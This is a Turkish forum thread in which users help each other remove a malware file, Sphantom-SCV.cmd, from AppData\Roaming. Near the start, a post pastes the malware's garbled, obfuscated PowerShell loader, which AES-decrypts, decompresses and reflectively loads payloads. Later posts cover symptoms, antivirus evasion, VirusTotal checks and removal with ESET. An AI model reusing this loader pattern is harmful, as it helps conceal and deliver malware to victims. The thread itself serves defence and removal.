Sphantom-SCV.cmd Nasıl Silinir?

  • Konuyu başlatan Konuyu başlatan DriveWithAzrail
  • Başlangıç Tarihi Başlangıç Tarihi
  • Mesaj Mesaj 9
  • Görüntüleme Görüntüleme 248
Katılım
21 Ocak 2024
Mesajlar
223
Çözümler
2
Beğeniler
134
Yer
Kocaeli
Eveet. Bakalım şu komutlara.

Kod:
C:\Windows\System32>echo cls; function decrypt function (Sparam var)(

ate(); Saes var. Hode- var) ( addingMode)::PKCS7; Mode-[Sy System. Security. Cryptography.Cipherlode):: Saes var.Key-[System.Com ography.CipherMode)::CBC; aes var. IV-[System.Convert):: FromBase64String("uZKCQ/Tyf9 Saes var-[System.Security.Cryptography. Sees var. Paddi dding-[System.Security. graphy.Aes]::Cre FromBase64String(HI/dNSCgaLdrNY10CFvRtbRac30V1+3725FF8w $return_var-$decryptor_var.TransforminalBlo ZXCQ/Tyf9zNqfrgw@yhMg); Saes var.Dispose(); ryStream(,Sparam_var) FinalBlock($param_var, 0, Sparam var. $return_var;)fur ar;) function decompress ); SpdqtA-New-Object S $decryptor var-Saes var.CreateDecry Length); $decryptor var.Dispose() ss_function($param var) ($XyfxT-New-Obj am($XyfxT, [10.Compression.CompressionMode System.IO.MemoryStream; $Ypluj-New-Object Syste ispose(); essionMode)::D SpdqtA.Dispose(); ::Decompress); SYpiUj.c CopyTo( (SpdqtA) ); Sypsuj.D em.10.Compression.6ZipStr Dispose(); System. Reflection.Assembly)::Load([byte[] SpdqtA.ToArray();) function execute function (Sparam var, Spar $UeExN-SErtZt. EntryPoint; 1a\AppData\Roaming\Sphantom-SCV.cmd"; Shost.UI. RawUI e):: ReadAllText($TXTqr).Split([Environment]::NewLine); GTTAMXAFNB')) WindowTitle SEXTOR: SOND CyfxT.D (Snull, $param2 var foreach ($1Zy03 in $OKPUM) (1 $TXTqr; SOXPLM(System.IO.F11 Spayload1 var-decompress function (decrypt function (Convert): Fromesest( SnZPwy-$1Zy03.Substring(20); break; })$pay) Replace('', A')))); $payload2_var-decompress function (decrypt function ([Convert ($1Zy03.StartsWith("Vjy1XChnv if ($12 String(Spayloads_var[0].Replace("',""). eplace('#','/'). Replace('', A)))); Spayload3 var-decompress function (decrypt_function ([Com e64String($payloads_var[1].R payloads_var[2].Replace(' ','/'). Replace('@', 'A')))) execute (decrypt function ([Convert)]:: FromBase64String($ ar Snull; execute function Spayload3_var ([s (string[function spayloadi var null; execute function Spayload2_v \Windows\System32\WindowsP PowerShell\v1. 6\powershell.e

Sphantom-SCV.cmd bir virüs. Konumu AppData\Roaming\.
Teşekkürler hocam.

@Recep Baltaş Hocam tam Appdata roaming klosörüne gidiyordum ki monitör gitti.
 
Ya monitörünüz bozuldu ya da bunu virüs yapıyor. Bozulması denk gelmiş olabilir. Restart attınız mı?

Hocam attım düzelmedi.

@Recep Baltaş Hocam denk gelmiş monitörün bozulması PC kapalı ama halen gitmiş durumda.

@Recep Baltaş hocam son olarak fark ettiğim kadarıyla virüsü roaming e ekleyip silen program scvhost.exe diye sahte uygulama ile yönetiyormuş.

Ve MBAM algılayınca injection ediyor ve anti virüs tarafında fark edilemez yapıyor.
 
Son düzenleyen: Moderatör:
USB'ye Kaspersky veya Eset yazıp o şekilde sistemi açıp taratır mısın?
Recep Hocam ben bu virüsün silimini biliyorum. Normalde bildiğim mönitöre etki etmiyor. Appdata/Roaming klasöründe bulunuyor virüs. Oradan bulup silmen gerekiyor.
Bakın burada var çözümü.

Hocam attım düzelmedi.

@Recep Baltaş Hocam denk gelmiş monitörün bozulması PC kapalı ama halen gitmiş durumda.

@Recep Baltaş hocam son olarak fark ettiğim kadarıyla virüsü roaming e ekleyip silen program scvhost.exe diye sahte uygulama ile yönetiyormuş.

Ve MBAM algılayınca injection ediyor ve anti virüs tarafında fark edilemez yapıyor.
Biz dosyayı bulup VT'ye atmıştık ancak hiç bir AV bulamadı.
 
Hocam virüsten kurtuldum silinmemesi için açılırken üzerinde şeçim yaparken orda "MBAM Detected" yazıyordu. Şu an virüsü sildim.
Nasıl sildin acaba?

Bu da VT sonucu.

Nasıl sildin acaba?

Bu da VT sonucu.
Selamlar arkadaşlar durum güncellemesi yapayım virüs artık ESET Nod 32 tarafından bulunuyor, yani Bilgisayarınıza ESET yükleyip bir tam tarama başlatarak veya:
ESET Online Scanner ile bir tam tarama başlatarak virüsten kurtulabilirsiniz.
Bu da güncellenmiş Virustotal raporu:VirusTotal
Halen silemezseniz Sosyal üzerinden yeni bir konu açın, yardımcı olalım.
 
Son düzenleyen: Moderatör:
Nasıl sildin acaba?

Bu da VT sonucu.


Selamlar arkadaşlar durum güncellemesi yapayım virüs artık ESET Nod 32 tarafından bulunuyor, yani Bilgisayarınıza ESET yükleyip bir tam tarama başlatarak veya:
ESET Online Scanner ile bir tam tarama başlatarak virüsten kurtulabilirsiniz.
Bu da güncellenmiş Virustotal raporu:VirusTotal
Halen silemezseniz Sosyal üzerinden yeni bir konu açın, yardımcı olalım.
Dediğim gibi Recep Hocanın söylediği taktikle sildim.
 
Geri
Yukarı Alt